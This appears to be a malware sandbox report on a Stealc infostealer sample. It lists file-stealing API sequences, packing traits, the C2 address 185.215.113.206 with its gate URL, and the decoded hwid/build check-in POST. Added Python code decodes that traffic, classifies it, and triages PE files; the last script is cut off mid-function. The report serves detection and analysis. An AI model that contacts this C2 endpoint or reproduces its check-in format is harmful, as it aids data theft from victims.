Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_006947C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0068F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00694B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00694B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00693B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00693B00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0068DB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0068BE40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0068EE20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0068DF10

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006862D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_006862D0
Source: unknown HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--
Source: file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpN
Source: file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpfh
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
Source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
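The check-in POST above, decoded and classified in Python. This is an added example and not part of the Joe Sandbox report: the request bytes are the ones printed in the report's Data Raw field, while the multipart parser and the looks_like_stealc_checkin() heuristic are written for this page. The heuristic is an illustration of the observed pattern (a two-field hwid/build form posted to a .php path on a bare IP host with no preceding DNS query, with the 4-dash plus 20-uppercase boundary seen in this capture); it is not the text of Suricata rule 2044243 and should be tuned before it is used for alerting.

```python
"""Decode and classify the Stealc check-in POST captured in the report.
Added example, not part of the sandbox report: the bytes below are copied from the
report's "Data Raw" field; the classifier is an illustrative heuristic for this page."""
import re

# Request exactly as printed in the report (not constructed).
REQUEST_LINE = "POST /6c4adf523b719729.php HTTP/1.1"
HOST = "185.215.113.206"
CONTENT_TYPE = "multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA"
CONTENT_LENGTH = 211
BODY = bytes.fromhex(
    "2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a "
    "2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    "74 61 6c 65 0d 0a "
    "2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a"
)


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Minimal RFC 2046 multipart/form-data parser: returns {field name: value}."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(1).encode("ascii")      # body uses "--" + boundary
    fields = {}
    for part in body.split(delimiter)[1:]:               # [0] is the preamble (empty here)
        if part.startswith(b"--"):                       # "--boundary--" closes the body
            break
        head, sep, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'[ ;]name="([^"]*)"', head)   # "[ ;]" keeps filename= from matching
        if sep and name:
            if value.endswith(b"\r\n"):
                value = value[:-2]                       # CRLF before the next delimiter
            fields[name.group(1).decode("ascii")] = value.decode("latin-1")
    return fields


def looks_like_stealc_checkin(request_line: str, host: str, content_type: str, body: bytes) -> bool:
    """Heuristic derived from this one capture (assumption, not a vendor signature):
    POST to a .php gate on a bare IP, boundary of 4 dashes + 20 uppercase letters,
    and exactly the two fields hwid (uppercase hex) and build."""
    method, path, _ = request_line.split(" ", 2)
    if method != "POST" or not path.endswith(".php"):
        return False
    if not re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):   # bare IP: matches "no DNS query"
        return False
    boundary = re.search(r"boundary=(\S+)", content_type)
    if not boundary or not re.fullmatch(r"-{4}[A-Z]{20}", boundary.group(1)):
        return False
    fields = parse_multipart(body, content_type)
    return set(fields) == {"hwid", "build"} and re.fullmatch(r"[0-9A-F]+", fields["hwid"]) is not None


if __name__ == "__main__":
    print(parse_multipart(BODY, CONTENT_TYPE))
    print("stealc check-in:", looks_like_stealc_checkin(REQUEST_LINE, HOST, CONTENT_TYPE, BODY))
```

Running the block prints the two form fields (hwid 9D0C824F71144293944220, build tale) and the classifier verdict; the decoded body is 211 bytes, matching the Content-Length header in the capture.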

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C0098 0_2_006C0098
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006B2138 0_2_006B2138
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006DB198 0_2_006DB198
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B4E14B 0_2_00B4E14B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006EE258 0_2_006EE258
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0099720E 0_2_0099720E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C4288 0_2_006C4288
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EF3C0 0_2_009EF3C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD73CB 0_2_00AD73CB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070B308 0_2_0070B308
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ADC305 0_2_00ADC305
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FD39E 0_2_006FD39E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C9489 0_2_009C9489
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006A4573 0_2_006A4573
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006AE544 0_2_006AE544
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C45A8 0_2_006C45A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006ED5A8 0_2_006ED5A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FA648 0_2_006FA648
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007096FD 0_2_007096FD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C66C8 0_2_006C66C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AA6645 0_2_00AA6645
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006DD720 0_2_006DD720
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F6799 0_2_006F6799
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006D4868 0_2_006D4868
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009E88CB 0_2_009E88CB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006EF8D6 0_2_006EF8D6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3281C 0_2_00A3281C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006DB8A8 0_2_006DB8A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ADA86A 0_2_00ADA86A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006D98B8 0_2_006D98B8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A979D6 0_2_00A979D6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AE1A03 0_2_00AE1A03
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A94BD3 0_2_00A94BD3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E8BD9 0_2_006E8BD9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F4BA8 0_2_006F4BA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F0B88 0_2_006F0B88
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FAC28 0_2_006FAC28
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA7C2A 0_2_00BA7C2A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C1C09 0_2_009C1C09
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006DBD68 0_2_006DBD68
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006B1D78 0_2_006B1D78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD8D99 0_2_00AD8D99
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006EAD38 0_2_006EAD38
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006D4DC8 0_2_006D4DC8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B9FD7B 0_2_00B9FD7B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006D5DB9 0_2_006D5DB9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C8E78 0_2_006C8E78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ADDE9C 0_2_00ADDE9C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F1EE8 0_2_006F1EE8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AEBFDB 0_2_00AEBFDB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B6AF6E 0_2_00B6AF6E
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00684610 appears 316 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: fozyxqhw ZLIB complexity 0.9946884020814342
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00699790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00693970 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00693970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\3TZGWVHC.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 2123776 > 1048576
Source: file.exe Static PE information: Raw size of fozyxqhw is bigger than: 0x100000 < 0x19b600
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.680000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00699BB0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x215498 should be: 0x20f1cd
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: fozyxqhw
Source: file.exe Static PE information: section name: gnsdcfju
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BC20AC push eax; mov dword ptr [esp], ebp 0_2_00BC2165
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AED0FE push 4AA7AFC2h; mov dword ptr [esp], edi 0_2_00AED150
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AED0FE push 27CE0C78h; mov dword ptr [esp], ecx 0_2_00AED17E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push 6604EB85h; mov dword ptr [esp], eax 0_2_00AC10F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push 2A19899Eh; mov dword ptr [esp], ebx 0_2_00AC112A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push 657E7F5Eh; mov dword ptr [esp], eax 0_2_00AC1138
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push edi; mov dword ptr [esp], esi 0_2_00AC1163
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push 463A6754h; mov dword ptr [esp], edx 0_2_00AC11CA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push edx; mov dword ptr [esp], 3C1F67F5h 0_2_00AC11D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA2042 push edx; mov dword ptr [esp], eax 0_2_00DA20BD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA2042 push edx; mov dword ptr [esp], 00001000h 0_2_00DA20CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA2042 push ecx; mov dword ptr [esp], ebx 0_2_00DA20DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA2042 push ebx; mov dword ptr [esp], 77F30161h 0_2_00DA20F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA2042 push edi; mov dword ptr [esp], 5FBD8444h 0_2_00DA211F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF4022 push 7E246A93h; mov dword ptr [esp], ebp 0_2_00BF3F57
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BAC005 push edi; mov dword ptr [esp], edx 0_2_00BAC6FF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF3072 push 2679ED87h; mov dword ptr [esp], edx 0_2_00BF30A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B5D068 push 633BB1C2h; mov dword ptr [esp], ecx 0_2_00B5D10C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B5D068 push ebp; mov dword ptr [esp], edi 0_2_00B5D125
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA7192 push eax; mov dword ptr [esp], esi 0_2_00BA71FD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B031F1 push eax; mov dword ptr [esp], ecx 0_2_00B0322C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B031F1 push 1E9AC6AAh; mov dword ptr [esp], edx 0_2_00B03279
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA21B7 push edi; mov dword ptr [esp], esp 0_2_00DA21C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA21B7 push ebx; mov dword ptr [esp], 7F9BAFF6h 0_2_00DA21D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA21B7 push eax; mov dword ptr [esp], ecx 0_2_00DA221B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA21B7 push ecx; mov dword ptr [esp], 6F55E5AAh 0_2_00DA2225
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A0613E push edi; mov dword ptr [esp], 199F7ED6h 0_2_00A061A3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A0613E push 7533DAF5h; mov dword ptr [esp], ecx 0_2_00A061BC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A5D17C push ebp; mov dword ptr [esp], esi 0_2_00A5D2C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A5D17C push eax; mov dword ptr [esp], edx 0_2_00A5D2D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B4E14B push 2D004818h; mov dword ptr [esp], ebx 0_2_00B4E171
Source: file.exe Static PE information: section name: fozyxqhw entropy: 7.952608283646461
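The static PE findings listed under System Summary and Data Obfuscation (section names made of unprintable characters, fozyxqhw at entropy 7.95, the entry point inside .taggant, the checksum that does not match the file) can be reproduced with nothing but the Python standard library. This is an added example and not part of the report: the PE it assembles is constructed to exhibit the same traits and is not file.exe, the 7.0-bit entropy threshold and the list of "standard" section names are assumptions, and the checksum routine follows the imagehlp CheckSumMappedFile algorithm.

```python
"""Stdlib-only static PE triage reproducing the report's checks: section names with
non-printable characters, high-entropy (packed) sections, an entry point outside the
standard sections and a header checksum that does not match the file.
Added example, not part of the sandbox report; the PE assembled by build_sample_pe() is
constructed for demonstration and is not the analysed file.exe."""
import hashlib
import math
import struct
from collections import Counter

STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",   # assumption
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".debug"}
HIGH_ENTROPY = 7.0        # bits per byte (assumed cut-off); compressed or encrypted data sits close to 8
LARGE_SECTION = 0x100000  # the report's "raw size is bigger than" threshold
OPT_HDR_FMT = "<HBB9I6H4I2H6I"  # IMAGE_OPTIONAL_HEADER32 without data directories (96 bytes)
SECTION_FMT = "<8s6I2HI"        # IMAGE_SECTION_HEADER (40 bytes)
CHECKSUM_OFF = 64               # OptionalHeader.CheckSum, relative to the optional header

def shannon_entropy(data: bytes) -> float:
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """imagehlp CheckSumMappedFile: dword sum with carries folded back in, the CheckSum
    field itself skipped, folded to 16 bits, plus the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off != checksum_offset:
            total += struct.unpack_from("<I", padded, off)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)

def optional_header_offset(data: bytes) -> int:
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    return e_lfanew + 24        # signature (4) + IMAGE_FILE_HEADER (20)

def triage(data: bytes) -> dict:
    opt = optional_header_offset(data)
    n_sections, = struct.unpack_from("<H", data, opt - 18)   # FileHeader.NumberOfSections
    size_opt, = struct.unpack_from("<H", data, opt - 4)      # FileHeader.SizeOfOptionalHeader
    entry_rva, = struct.unpack_from("<I", data, opt + 16)
    stored, = struct.unpack_from("<I", data, opt + CHECKSUM_OFF)
    sections, entry_section = [], None
    for i in range(n_sections):
        raw_name, vsize, va, raw_size, raw_ptr = struct.unpack_from(SECTION_FMT, data, opt + size_opt + 40 * i)[:5]
        raw_name = raw_name.rstrip(b"\0")
        printable = bool(raw_name) and all(0x21 <= b < 0x7F for b in raw_name)
        name = raw_name.decode("ascii") if printable else ""   # blank, as the report prints it
        entropy = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])
        sections.append({"name": name, "special_chars": not printable, "entropy": round(entropy, 3),
                         "high_entropy": entropy > HIGH_ENTROPY, "oversized": raw_size > LARGE_SECTION})
        if va <= entry_rva < va + max(vsize, raw_size):
            entry_section = name
    computed = pe_checksum(data, opt + CHECKSUM_OFF)
    return {"sections": sections, "entry_section": entry_section,
            "entry_outside_standard": entry_section not in STANDARD_SECTIONS,
            "checksum_stored": stored, "checksum_computed": computed, "checksum_ok": stored == computed}

def fix_checksum(data: bytes) -> bytes:
    """Write the correct checksum into the header, as a linker would have."""
    off = optional_header_offset(data) + CHECKSUM_OFF
    patched = bytearray(data)
    struct.pack_into("<I", patched, off, pe_checksum(data, off))
    return bytes(patched)

def build_sample_pe(sections, entry_rva: int) -> bytes:
    """Assemble a minimal 32-bit PE from (name, body, characteristics) tuples. Constructed
    input; CheckSum is left at 0 so triage() reports a mismatch like the report does."""
    file_align, sect_align = 0x200, 0x1000
    size_of_headers = -(-(0x40 + 4 + 20 + 224 + 40 * len(sections)) // file_align) * file_align
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                              # e_lfanew = 0x40
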